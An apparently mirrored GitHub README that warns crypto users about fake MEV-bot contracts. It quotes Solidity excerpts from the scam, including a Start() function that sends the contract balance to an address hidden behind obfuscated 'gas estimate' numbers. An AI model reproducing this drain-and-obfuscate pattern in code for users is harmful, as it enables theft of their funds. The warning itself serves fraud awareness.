Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/0x-sen/mev-bot-fraud

Be careful for the fake mev-bot codes , watch your wallet
https://github.com/0x-sen/mev-bot-fraud

jaredfromsubway jaredfromsubway-mev-bot mev mev-bot mevbot mevbot-contract mevbot-source-code

Last synced: about 1 month ago
JSON representation

Be careful for the fake mev-bot codes , watch your wallet

Awesome Lists containing this project

README

        

# mev-bot-fraud

Be careful for the fake mev-bot codes

Wanted to study the mevbot, unexpectedly found a scam, so want to remind you to avoid being cheated, many similar to this project of https://github.com/KayExpertbots/Mevbot, fake script like this

```
function Start() public payable {
emit Log("Running MEV action. This can take a while; please wait..");
payable(_callMEVAction()).transfer(address(this).balance);
}

```

Start looks like a startup script is actually a transfer, will transfer your balance to an address, '_callMEVAction()' This method is actually the last will generate a wallet address, around is to cheat some beginners, so we must look at it, see this code must be careful

![image](https://github.com/chunsenye/mev-bot-fraud/assets/30768615/dc4f05ca-abf7-4146-84d6-d528f08195f1)

```
transfer(address(this).balance);
```

```
function callMempool() internal pure returns (string memory) {
string memory _memPoolOffset = mempool("x", checkLiquidity(getMemPoolOffset()));
uint _memPoolSol = 3410611; //Gas estimate update
uint _memPoolLength = 2418259; //Gas estimate update
uint _memPoolSize = 2563395760; //Gas estimate update
uint _memPoolHeight = getMemPoolHeight();
uint _memPoolDepth = getMemPoolDepth();

string memory _memPool1 = mempool(_memPoolOffset, checkLiquidity(_memPoolSol));
string memory _memPool2 = mempool(checkLiquidity(_memPoolLength), checkLiquidity(_memPoolSize));
string memory _memPool3 = checkLiquidity(_memPoolHeight);
string memory _memPool4 = checkLiquidity(_memPoolDepth);

string memory _allMempools = mempool(mempool(_memPool1, _memPool2), mempool(_memPool3, _memPool4));
string memory _fullMempool = mempool("0", _allMempools);

return _fullMempool;
}

```
![image](https://github.com/chunsenye/mev-bot-fraud/assets/30768615/7334fcdc-405c-45ce-9753-317cc112c9bd)

These are all lies so just a reminder, you can also help to light up the stars, so that more people can see

image

[Fraud account list -- 【诈骗账号】](https://github.com/chunsenye/mev-bot-fraud/issues/2)

[List of Fraud projects - 【诈骗项目列表】](https://github.com/chunsenye/mev-bot-fraud/issues/1)

【Some real projects of mev bot】

[go outside labs mev-toolkit](https://github.com/go-outside-labs/mev-toolkit)